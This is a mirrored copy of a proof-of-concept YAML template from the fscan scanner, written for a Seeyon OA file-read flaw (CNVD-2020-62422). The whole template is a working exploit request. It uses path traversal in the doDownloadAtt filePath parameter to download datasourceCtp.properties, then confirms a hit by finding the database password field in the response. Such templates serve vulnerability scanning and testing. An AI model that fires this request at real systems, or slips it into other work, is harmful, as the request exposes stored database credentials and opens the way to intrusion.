mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-05-28 01:05:02 +00:00
12 lines
525 B
YAML
12 lines
525 B
YAML
name: poc-yaml-seeyon-cnvd-2020-62422-readfile
|
|
rules:
|
|
- method: GET
|
|
path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
|
|
follow_redirects: false
|
|
expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
|
|
detail:
|
|
author: Aquilao(https://github.com/Aquilao)
|
|
info: seeyon readfile(CNVD-2020-62422)
|
|
links:
|
|
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
|